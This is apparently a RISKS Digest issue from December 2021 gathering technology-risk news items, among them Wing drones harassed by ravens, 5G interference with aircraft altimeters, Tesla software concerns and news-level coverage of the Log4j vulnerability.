Please try the URL privacy information feature enabled by clicking the flashlight icon above. This will reveal two icons after each link the body of the digest. The shield takes you to a breakdown of Terms of Service for the site - however only a small number of sites are covered at the moment. The flashlight take you to an analysis of the various trackers etc. that the linked site delivers. Please let the website maintainer know if you find this useful or not. As a RISKS reader, you will probably not be surprised by what is revealed…
Markus Mannheim, ABC News Australia 10 Dec 2021 via ACM TechNews, Wednesday, December 15, 2021
Alphabet's Wing subsidiary has relaunched drone-based coffee and fast food deliveries to the Harrison suburb of Canberra, Australia, following the service's suspension in September due to attacks by nesting ravens. Ornithologist Neil Hermes discovered a pair of ravens had a nest with three chicks in a tree near a Wing customer; the ravens were approaching the drones from behind, as they would if the drone were a predator and they were trying to encourage it to leave. The service restarted after the chicks had fledged (grown wing feathers large enough for flight). Said Hermes, “We certainly need to be careful to ensure that we're aware of the impacts [of what we're doing].” https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2d9e6x230174x072181&
Former inspector of Virginia nuclear plant pleads guilty of falsifying inspection reports [image: North Anna Nuclear Power Station. (Source: Dominion Virginia Power)] North Anna Nuclear Power Station. (Source: Dominion Virginia Power) NBC12 Newsroom 13 Dec 2021 and updated
LOUISA Co., Va. (WWBT) - The former senior resident inspector of the North Anna Nuclear Power Station pleaded guilty to making false statements on inspection reports.
Sixty-year-old Gregory Croon of Tennessee worked for the U.S. Nuclear Regulatory Commission (NRC) and was working at the North Anna plant between 2016 and 2018.
On Monday, Croon pleaded guilty to falsifying inspection reports in federal court.
“The accuracy of NRC inspection reports is critical to the NRC's oversight of licensees' safe operation of nuclear power plants around the nation,'' said NRC Inspector General Robert J. Feitel. “Croon's false statements could have jeopardized that safety oversight function.''
Federal officials did not say if there were any short or long-term safety concerns following the investigation, only that the false reports could have jeopardized the safety oversight of the plant.
“The combined efforts of the NRC OIG special agents and our law enforcement partners yielded an appropriate and just result in this case. Nonetheless, it is vital to remember that we must all remain vigilant, watch for fraudulent activity, and report it promptly,''
Croon will be sentenced in March.
CIA Director William Burns said the agency has “a number of different projects focused on cryptocurrency” on the go.
There's a long-running conspiracy theory among a small number of cryptocurrency enthusiasts that Bitcoin's anonymous inventor, Satoshi Nakamoto, was actually the CIA or another three-lettered agency. That fringe theory is having a fresh day in the sun after CIA Director William Burns said on Monday that the intelligence agency has “a number of different projects focused on cryptocurrency” on the go.
Burns made his comments at the tail end of a talk at the Wall Street Journal 's CEO Summit. After discussing everything from the possible Russian invasion of Ukraine to the challenges of space, someone in the audience asked if the agency is on top of cryptocurrencies, which are currently at the center of the ransomware epidemic that U.S. officials are attempting to get a handle on and stamp out. Here's what Burns said: <https://www.wsj.com/video/events/cia-director-on-today-global-challenges/C60765B3-8C1C-495F-8094-99E64C6637A5.html>
“This is something I inherited. My predecessor had started this, but had set in motion a number of different projects focused on cryptocurrency and trying to look at second- and third-order consequences as well and helping with our colleagues in other parts of the U.S. government to provide solid intelligence on what we're seeing as well.”
This is hardly surprising given the focus ransomware is getting from every corner of government. This year, a ransomware attack targeting a pipeline company led to a shutdown, panic buying, and a gas shortage in several states. <https://www.vice.com/en/article/dyvpyw/everything-you-need-to-know-about-the-pipeline-hack>
Cryptocurrencies “could have enormous impact on everything from ransomware attacks, as you mentioned, because one of the ways of getting at ransomware attacks and deterring them is to be able to get at the financial networks that so many of those criminal networks use and that gets right at the issue of digital currencies as well,” Burns said. […]
https://www.vice.com/en/article/dyp7vw/the-cia-is-deep-into-cryptocurrency-director-reveals
On 7 Dec 2021 the U.S. federal Aviation Administration issued draft Airworthiness Directives related to possible interference between 5G telecoms (including 5G handsets) and aircraft Radar altimeters.
This AD was prompted by a determination that radio altimeters cannot be relied upon to perform their intended function if they experience interference from wireless broadband operations in the 3.7-3.98 GHz frequency band as used by 5G.
It is based on a world wide task force managed by RTCA. It found that:
The FAA determined that, at this time, no information has been presented that shows radio altimeters are not susceptible to interference caused by C-Band emissions permitted in the United States. The FAA will examine all airports across the U.S. to identify those with nearby 5G base stations and will issue NOTAMs advising of the issues.
As background the radio altimeter is more precise than a barometric altimeter and for that reason is used where aircraft height over the ground needs to be precisely measured, such as auto-land or other low altitude or low-viz operations. It also feeds accurate height data to auto-pilot and auto landing systems. So it looks like just when the radar altimeter must be performing at its absolute best (ie near the ground) it could be impacted by 5G transmissions which could severely impact the safe flight of the aircraft.
For more info see https://www.faa.gov/newsroom/faa-statement-5g and its attachments. [Also noted by Monty Solomon. PGN]
I think it's very notable that a LANDLINE saved the day. No apps to confuse them. They just work. LW
The machine learning technology used here is very similar (if not identical) to what has been used in the past for deepfakes, making fake video look and sound real. A prime example of this is the Emmy Award-winning demonstration video produced by MIT's Center for Advanced Virtuality, “In Event of Moon Disaster,” which depicts then-president Nixon reading a prepared statement that the Apollo 11 astronauts had perished in a catastrophe. To create it, MIT used Nixon's likeness and speech from television appearances and fed it into a machine learning system to synthesize the audio and video and produce the uncanny film.
The demonstration is a warning that these technologies can be used for nefarious purposes. There are currently efforts underway, such as with the Coalition for Content Provenance and Authenticity (C2PA), to create standards for providing context and history for digital media to prove the authenticity for a particular image or video/audio stream in the future can be established, as it is expected that these technologies will be used much more heavily in the future.
So can this deepfake technology be used for evil? Yes. But if Get Back proves anything, it shows it can be used for “deep restoration” as well. A great deal of vintage content can be repaired in this way, be it original films or archival footage that can make it look brand new again — or the freshest they have ever looked and shown on modern content delivery platforms.
https://www.zdnet.com/article/the-beatles-get-back-shows-that-deepfake-tech-isnt-always-evil/
— Gabriel Goldberg, Computers and Publishing, Inc. gabe@gabegold.com 3401 Silver Maple Place, Falls Church, VA 22042 (703) 204-0433 LinkedIn: http://www.linkedin.com/in/gabegold Twitter: GabeG0
In addition, some who have long worked on autonomous vehicles for other companies — as well as seven former members of the Autopilot team — have questioned Tesla's practice of constant modifications to Autopilot and F.S.D., pushed out to drivers through software updates, saying it can be hazardous because buyers are never quite sure what the system can and cannot do.
https://www.nytimes.com/2021/12/06/technology/tesla-autopilot-elon-musk.html
The feature raises fresh questions about whether Tesla is compromising safety as it rushes to add new technologies.
Not long after buying a Tesla Model 3 this summer, Vince Patton saw a YouTube clip highlighting a feature that took him by surprise: three video games that can be played on the large touch screen mounted in front of the dashboard — while driving down the road.
“I thought surely that can’t be right,” Mr. Patton, a retiree in Lake Oswego, Ore.
But in a parking lot, he gave it a try, and he was able to play a solitaire game on the Model 3 while in motion. “I only did it for like five seconds and then turned it off,” he said. “I’m astonished. To me, it just seems inherently dangerous.”
The automaker added the games in an over-the-air software update that was sent to most of its cars this summer. They can be played by a driver or by a passenger in full view of the driver, raising fresh questions about whether Tesla is compromising safety as it rushes to add new technologies and features in its cars.
https://www.nytimes.com/2021/12/07/business/tesla-video-game-driving.html
Tesla, not playing with a full deck…
U.S. Cert:
Security experts around the world raced Friday, Dec. 10, 2021, to patch one of the worst computer vulnerabilities discovered in years, a critical flaw in open-source code widely used across industry and government in cloud services and enterprise software. Cybersecurity experts say users of the online game Minecraft have already exploited it to breach other users by pasting a short message into in a chat box. Credit: AP Photo/Damian Dovarganes, File Security experts around the world raced Friday to patch one of the worst computer vulnerabilities discovered in years, a critical flaw in open-source code widely used across industry and government in cloud services and enterprise software.
“I'd be hard-pressed to think of a company that's not at risk,” said Joe Sullivan, chief security officer for Cloudflare, whose online infrastructure protects websites from malicious actors. Untold millions of servers have it installed, and experts said the fallout would not be known for several days.
- - - -
Monty Solomon <monty@roscom.com>: Hackers launch over 840,000 attacks through Log4J flaw
- - - -
Monty Solomon <monty@roscom.com> As Log4Shell wreaks havoc, payroll service reports ransomware attack
- - - -
Dan Goodin, Ars Techica, 9 Dec 2021 Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet Minecraft is the first, but certainly not the last, app known to be affected.
Exploit code has been released for a serious code-execution vulnerability in Log4j, an open source logging utility that's used in countless apps, including those used by large enterprise organizations, several websites reported last Thursday.
Word of the vulnerability first came to light on sites catering to users of Minecraft, the best-selling game of all time. The sites warned that hackers could execute malicious code on servers or clients running the Java version of Minecraft by manipulating log messages, including from things typed in chat messages. The picture became more dire still as Log4j was identified as the source of the vulnerability, and exploit code was discovered posted online.
A big deal
“The Minecraft side seems like a perfect storm, but I suspect we are going to see affected applications and devices continue to be identified for a long time,'' HD Moore, founder and CTO of network discovery platform Rumble, said. “This is a big deal for environments tied to older Java runtimes: Web front ends for various network appliances, older application environments using legacy APIs, and Minecraft servers, due to their dependency on older versions for mod compatibility.''
Reports are already surfacing of servers performing Internet-wide scans in attempts to locate vulnerable servers. Log4j is incorporated into a host of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink. That means that a dizzying number of third-party apps may also be vulnerable to exploits of the same high severity as those threatening
Minecraft users.
At the time this post went live, there wasn't much known about the vulnerability. One of the few early sources providing a tracking number for the vulnerability was Github, which said it's CVE-2021-44228. Security firm Cyber Kendra on late Thursday reported a Log4j RCE Zero day being dropped on the Internet and concurred with Moore that “there are currently many popular systems on the market that are affected.''
The Apache Foundation has yet to disclose the vulnerability, and representatives there didn't respond to an email. This Apache page does acknowledge the recent fixing of a serious vulnerability. Moore and other researchers said the Java deserialization bug stems from Log4j making network requests through the JNDI to an LDAP server and executing any code that's returned. The bug is triggered inside of log messages with use of the ${} syntax.
Additional reporting from security firm LunaSec said that Java versions greater than 6u211, 7u201, 8u191, and 11.0.1 are less affected by this attack vector, at least in theory, because the JNDI can't load remote code using LDAP. Hackers may still be able to work around this by leveraging classes already present in the target application. Success would depend on whether there are any dangerous gadgets in the process, meaning newer versions of Java may still prevent code execution but only depending on the specifics of each application.
LunaSec went on to say that cloud services from Steam and Apple iCloud have also been found to be affected. Company researchers also pointed out that a different high-severity vulnerability in struts led to the 2017 compromise of Equifax, which spilled sensitive details for more than 143 million U.S. consumers.
Cyber Kendra said that in November the Alibaba Cloud security team disclosed a vulnerability in Log4j2—the successor to Log4j—that stemmed from recursive analysis functions, which attackers could exploit by constructing malicious requests that triggered remote code execution. The firm strongly urged people to use the latest version of Log4j2 available here.
What it means for Minecraft
The Spigot gaming forum said that Minecraft versions 1.8.8 through the most current 1.18 release are all vulnerable, as did other popular game servers such as Wynncraft. Gaming server and news site Hypixel, meanwhile, urged Minecraft players to take extra care.
“The issue can allow remote access to your computer through the servers you log into,'' site representatives wrote. “That means any public server you go onto creates a risk of being hacked.''
Reproducing exploits for this vulnerability in Minecraft aren't straightforward because success depends not only on the Minecraft version running but also on the version of the Java framework the Minecraft app is running on top of. It appears that older Java versions have fewer built-in security protections that make exploits easier. On Friday, Minecraft rolled out a new game version that fixes the vulnerability. “We are aware of recent discussions regarding a public exploitation of a Log4j remote code execution vulnerability affecting various industry-wide Apache products,” Microsoft said in a statement. “We've taken steps to keep our customers safe and protected, which includes rolling out a fix that blocks this issue for Java Edition 1.18.1. Customers who apply the fix are protected.”
If you've always dreamed of flying to work, that dream may very soon be a reality.
If you have $92,000, that is.
Companies are always looking for new market niches, and flying cars are quickly becoming the next big thing.
There are plans for cars that both fly and work on the road and for flying taxis that will aim to form the basis of future travel.
Jetson is one of these companies.
The company aims “to make the skies available for everyone with our safe personal electric aerial vehicle,” according to its website.
The company's first flying car, Jetson One, is already on sale.
Jetson One has a maximum speed of 63mph thanks to its eight electric motors which generate 102 horsepower. The car can run continually for 20 minutes. […]
https://www.businessinsider.com/new-flying-car-goes-63-mph-20-minutes-costs-92000-2021-12
https://techxplore.com/news/2021-12-unveil-cyber-logic.html
“The researchers looked into Mystique, a new class of attacks on printed objects that leverage emerging 4D printing technology to introduce embedded computer code—or logic bombs—by manipulating the manufacturing process.”
“Mystique enables visually harmless objects to behave maliciously when a logic bomb is triggered by a stimulus such as changes in temperature, moisture, pH or modifications to the materials used initially, potentially causing catastrophic operational failures when they are used.”
4D printing (see https://en.wikipedia.org/wiki/4D_printing) applies 3D printer technology with “ink” (gels, fibers, polymers, etc.) sensitized to adjust their shape or material properties in response to environmental conditions: pH, temperature, stress, humidity, magnetic field, sound level, etc. The “Mystique” class of defects and vulnerabilities might arise in a printed structures such as artificial bone or tissue foundation.
The essay discusses means of Mystique-injected defect detection using CAT scans and material sensors to ensure specified manufactured product outcome before shipping to a customer.
[Trust that neither the inspection verification measures, nor the employees with product release approval, are compromised.]
It can take images that are better than existing tech.
A newly-developed camera the size of a grain of salt can take clear, full-color images at the level of cameras that are 500,000 times larger.
Researchers at Princeton University and the University of Washington created a new type of optical system, called a metasurface, to shrink the camera's hardware down to size, and combined this with machine-learning image processing that enables the camera to produce clear images in natural lighting. Previously, micro-cameras could only produce useful images in perfect laboratory settings, according to the researchers <https://engineering.princeton.edu/news/2021/11/29/researchers-shrink-camera-size-salt-grain>. Their work is published in the journal Nature. <https://www.nature.com/articles/s41467-021-26443-0>
Each camera consists of 1.6 million cylindrical posts which interact with light to produce the images. These posts are as small as the human immunodeficiency virus (HIV). The surfaces are made from silicon nitride, a material that makes them compatible with computing microchip manufacturing. This means they'd be cheaper and faster to produce than current full-size camera lenses. […]
https://www.vice.com/en/article/4awxvg/researchers-made-a-camera-thats-the-size-of-a-grain-of-salt
Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.
Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.
https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
Employees who complained about the lack of moderation say they were sidelined.
https://www.washingtonpost.com/technology/2021/12/10/twitter-turmoil-spaces/
Qualcomm's new always-on smartphone camera is a potential privacy nightmare
Your phone's front camera is always securely looking for your face, even if you don't touch it or raise to wake it. i That's how Qualcomm Technologies vice president of product management Judd Heape introduced the company's new always-on camera capabilities <https://youtu.be/3H6tfcZLHfg?t=10758> in the Snapdragon 8 Gen 1 processor set to arrive in top-shelf Android phones early next year. <https://www.theverge.com/2021/11/30/22809687/qualcomm-snapdragon-8-gen-1-chip-smartphone-processor-specs-details>
Depending on who you are, that statement can either be exciting or terrifying. For Qualcomm, it thinks this new feature will enable new use cases, like being able to wake and unlock your phone without having to pick it up or have it instantly lock when it no longer sees your face.
But for those of us with any sense of how modern technology is used to violate our privacy, a camera on our phone that’s always capturing images even when we’re not using it sounds like the stuff of nightmares and has a cost to our privacy that far outweighs any potential convenience benefits.
Qualcomm's main pitch for this feature is for unlocking your phone any time you glance at it, even if it's just sitting on a table or propped up on a stand. You don't need to pick it up or tap the screen or say a voice command — it just unlocks when it sees your face. I can see this being useful if your hands are messy or otherwise occupied (in its presentation, Qualcomm used the example of using it while cooking a recipe to check the next steps). Maybe you’ve got your phone mounted in your car, and you can just glance over at it to see driving directions without having to take your hands off the steering wheel or leave the screen on the entire time.
The company is also spinning it as making your phone more secure by automatically locking the phone when it no longer sees your face or detects someone looking over your shoulder and snooping on your group chat. It can also suppress private information or notifications from popping up if you’re looking at the phone with someone else. Basically, if you're not looking at it, your phone is locked; if it can see you, it will be unlocked. If it can see you and someone else, it can automatically lock the phone or hide private information or notifications from displaying on the screen. […]
> You asked “Is it illegal to use your cell-phone for navigation purposes? > What is the difference between that and a built-in screen for navigation?
https://roadsafety.transport.nsw.gov.au/stayingsafe/mobilephones/know-the-rules.html
has the answer.
You have to mount the phone in an approved cradle.
“2. Can I touch my phone if it is in a cradle?
If your phone is secured in a cradle, you can only touch your phone:
I hope this helps. The law is pretty sensible, which is good, I guess.
Please report problems with the web pages to the maintainer